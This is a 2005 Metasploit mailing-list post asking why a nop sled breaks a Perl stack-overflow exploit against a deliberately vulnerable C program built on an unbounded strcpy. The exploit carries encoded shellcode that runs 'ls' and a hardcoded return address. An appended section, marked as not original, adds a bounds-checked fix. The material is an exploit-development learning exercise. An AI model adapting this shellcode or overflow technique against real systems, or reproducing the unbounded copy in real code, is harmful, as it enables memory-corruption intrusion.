Metasploit mailing list archives
Nop sled problem
From: shellsangel at gmail.com (shells angel)
Date: Thu, 3 Nov 2005 14:29:31 +0100
Hi,

At the moment I'm trying to exploit a trivial stack overflow in the following C program:

---stack_vuln1.c---
#include <stdio.h>
#include <string.h>   /* for strcpy */

void vuln(char *str)
{
    char buff[128];
    strcpy(buff, str);   /* unbounded copy: the overflow under discussion */
    printf("buff at %x contains: %s\n", buff, buff);
}

int main(int argc, char *argv[])
{
    vuln(argv[1]);
    return 0;
}
---end of stack_vuln1.c---

To exploit the program I've written this exploit in perl:

---exploit code---
#!/usr/bin/perl -w
use strict;

# linux_ia32_exec - CMD=ls Size=64 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
    "\x31\xc9\x83\xe9\xf6\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb4" .
    "\x96\x4d\x1d\x83\xeb\xfc\xe2\xf4\xde\x9d\x15\x84\xe6\xf0\x25\x30" .
    "\xd7\x1f\xaa\x75\x9b\xe5\x25\x1d\xdc\xb9\x2f\x74\xda\x1f\xae\x4f" .
    "\x5c\x95\x4d\x1d\xb4\xfa\x3e\x1d\xe3\xc5\xc4\xfc\x79\x16\x4d\x1d";

my $buffer_length = 128;
my $eip_offset    = $buffer_length + 4;
my $nop_sled      = "\x90" x ($eip_offset - length($shellcode));
my $ret           = pack('i', 0xbffff938);
my $payload       = $nop_sled . $shellcode . $ret . "\0";

exec './stack_vuln1', $payload;
---end of exploit code---

As you can see, I borrowed the shellcode from the metasploit framework. This shellcode is located at this url:

http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x813862cc%29&MODULE=linux_ia32_exec&MODE=GENERATE&OPT_CMD=ls&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload

The problem I'm experiencing is somehow related to the nop sled. Whenever I change the line:

my $payload = $nop_sled . $shellcode . $ret . "\0";

to:

my $payload = $shellcode . $nop_sled . $ret . "\0";

the shellcode will get executed correctly. But as far as I understand, this renders the entire nop sled useless because the RET address will jump directly to the beginning of the shellcode. Otherwise (placing the shellcode behind the nop sled) the program crashes due to a Segmentation Fault. The odd thing is that the nop sled will get executed along with a part of the shellcode (checked it with GDB).

Does anyone know what the problem could be?

Thanks in advance,
shellsangel
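Added example, not part of the original post or of the Metasploit project: the bounded-copy counterpart of the vuln() function from stack_vuln1.c above. It keeps the same 128-byte stack buffer but rejects any argument that would not fit, so the saved return address the exploit overwrites (buffer plus 4 bytes, per the post's $eip_offset) is never reachable from the input. The names vuln_safe and try_input_of_length, and the choice to reject rather than truncate, are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same buffer size as stack_vuln1.c so the comparison is like for like. */
#define BUFF_SIZE 128

/* Hardened version of vuln(): the copy is bounded by the destination size.
 * Returns 0 when the string was copied, -1 when it was rejected as too long.
 * Rejecting (instead of silently truncating) keeps the caller aware that
 * input was dropped, which matters when the data feeds later logic. */
int vuln_safe(const char *str)
{
    char buff[BUFF_SIZE];
    size_t len = strlen(str);

    /* Need room for the terminating NUL, so len must be < BUFF_SIZE. */
    if (len >= BUFF_SIZE) {
        fprintf(stderr, "input of %zu bytes rejected: exceeds %d-byte limit\n",
                len, BUFF_SIZE - 1);
        return -1;
    }

    /* Length already validated, so this copy (including the NUL) cannot
     * run past buff and cannot touch the saved frame pointer or return address. */
    memcpy(buff, str, len + 1);
    printf("buff contains: %s\n", buff);
    return 0;
}

/* Test helper (constructed for this example): builds an input of n 'A' bytes,
 * mirroring an over-long argv[1], and reports what vuln_safe did with it. */
int try_input_of_length(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return -1;
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = vuln_safe(s);
    free(s);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return vuln_safe(argv[1]) == 0 ? 0 : 1;
}
```

Run with an argument of 127 characters or fewer and it behaves like the original; with 128 or more (including the 132 bytes the exploit needs to reach the return address) it refuses the input instead of corrupting the frame.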
Current thread:
- Nop sled problem shells angel (Nov 03)
- Nop sled problem mmiller at hick.org (Nov 03)
- Nop sled problem shells angel (Nov 03)
- Nop sled problem mmiller at hick.org (Nov 03)